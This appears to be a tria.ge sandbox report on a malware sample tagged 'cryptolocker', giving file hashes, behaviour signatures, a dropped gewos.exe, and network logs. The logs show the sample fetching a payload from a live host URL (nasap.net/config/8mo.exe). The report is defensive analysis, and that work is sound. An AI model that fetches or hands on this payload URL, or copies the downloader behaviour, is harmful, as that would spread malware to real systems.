Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

7

2024-08-18...er.exe

windows7-x64

7

2024-08-18...er.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    117s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    18/08/2024, 15:28 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-08-18_c6bff227bacc93cb742bc02efd92af32_cryptolocker.exe

  • Size

    57KB

  • MD5

    c6bff227bacc93cb742bc02efd92af32

  • SHA1

    95fe8f1467e5a24289a4cffa7a00b727fb8cce15

  • SHA256

    0eb5eba5a0b1035855bcbfbda1a5fac957455baf2428961561a99c55e21c8385

  • SHA512

    799ddd43f45dc465342fbe4b8161ec091609445b24a6b0e8f8d42801259815af2bb01003a43d38f0b28f12c5c6f2f45cc96d370a976eb4a31dbf864a526923ec

  • SSDEEP

    768:bP9g/WItCSsAfFaeOcfXVr3BPOz5CFBmNuFgUjl+V:bP9g/xtCS3Dxx0JV

Score
7/10
discoveryupx

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-08-18_c6bff227bacc93cb742bc02efd92af32_cryptolocker.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-08-18_c6bff227bacc93cb742bc02efd92af32_cryptolocker.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:2936
    • C:\Users\Admin\AppData\Local\Temp\gewos.exe
      "C:\Users\Admin\AppData\Local\Temp\gewos.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of UnmapMainImage
      PID:2428

Network

  • flag-us
    DNS
    nasap.net
    gewos.exe
    Remote address:
    8.8.8.8:53
    Request
    nasap.net
    IN A
    Response
    nasap.net
    IN A
    35.212.119.5
  • flag-us
    GET
    https://nasap.net/config/8mo.exe
    gewos.exe
    Remote address:
    35.212.119.5:443
    Request
    GET /config/8mo.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: nasap.net
    Cache-Control: no-cache
    Response
    HTTP/1.1 202 Accepted
    Server: nginx
    Date: Sun, 18 Aug 2024 15:29:10 GMT
    Content-Type: text/html
    Content-Length: 184
    Connection: keep-alive
    SG-Captcha: challenge
    X-Robots-Tag: noindex
    Set-Cookie: nevercache-b39818=Y;Max-Age=-1
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Cache-Control: no-store,no-cache,max-age=0
    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
    X-Proxy-Cache-Info: DT:1
  • flag-us
    DNS
    crl.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    crl.microsoft.com
    IN A
    Response
    crl.microsoft.com
    IN CNAME
    crl.www.ms.akadns.net
    crl.www.ms.akadns.net
    IN CNAME
    a1363.dscg.akamai.net
    a1363.dscg.akamai.net
    IN A
    95.101.28.27
    a1363.dscg.akamai.net
    IN A
    95.101.28.49
  • flag-gb
    GET
    http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
    Remote address:
    95.101.28.27:80
    Request
    GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Wed, 01 May 2024 09:28:59 GMT
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: crl.microsoft.com
    Response
    HTTP/1.1 200 OK
    Content-Length: 1036
    Content-Type: application/octet-stream
    Content-MD5: 5xIscz+eN7ugykyYXOEdbQ==
    Last-Modified: Thu, 11 Jul 2024 01:45:51 GMT
    ETag: 0x8DCA14B323B2CC0
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: fc0a01f1-501e-006a-178c-d38fc2000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 18 Aug 2024 15:29:42 GMT
    Connection: keep-alive
  • 35.212.119.5:443
    https://nasap.net/config/8mo.exe
    tls, http
    gewos.exe
    1.1kB
     6.0kB
     11
    10

    HTTP Request

    GET https://nasap.net/config/8mo.exe

    HTTP Response

    202
  • 95.101.28.27:80
    http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
    http
    752 B
     3.1kB
     7
    5

    HTTP Request

    GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

    HTTP Response

    200
  • 8.8.8.8:53
    nasap.net
    dns
    gewos.exe
    55 B
     71 B
     1
    1

    DNS Request

    nasap.net

    DNS Response

    35.212.119.5

  • 8.8.8.8:53
    crl.microsoft.com
    dns
    63 B
     162 B
     1
    1

    DNS Request

    crl.microsoft.com

    DNS Response

    95.101.28.27
    95.101.28.49

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\gewos.exe
    Filesize

    57KB

    MD5

    40309c2a46d9292204f3efd4488ab263

    SHA1

    194baea26b8c1605904379aa24b55c46173bdd98

    SHA256

    27d3e9001301b83fb9802b514e936dc73dff2df58a13cb9682cef17d6c3d06d1

    SHA512

    10588c2b41bc57c88c76bbfbaa199790f2b4409643648d437df87c2d4419ea50920a64a04f77f877fe80399647dedf445f3833a953fc902c9d053db262c9961f

    Download Submit

  • memory/2428-16-0x0000000000400000-0x000000000040E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/2428-18-0x00000000002C0000-0x00000000002C6000-memory.dmp

    Filesize

    24KB

    Download

  • memory/2936-0-0x0000000000400000-0x000000000040E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/2936-1-0x0000000000430000-0x0000000000436000-memory.dmp

    Filesize

    24KB

    Download

  • memory/2936-2-0x0000000000400000-0x0000000000406000-memory.dmp

    Filesize

    24KB

    Download

  • memory/2936-8-0x0000000000430000-0x0000000000436000-memory.dmp

    Filesize

    24KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.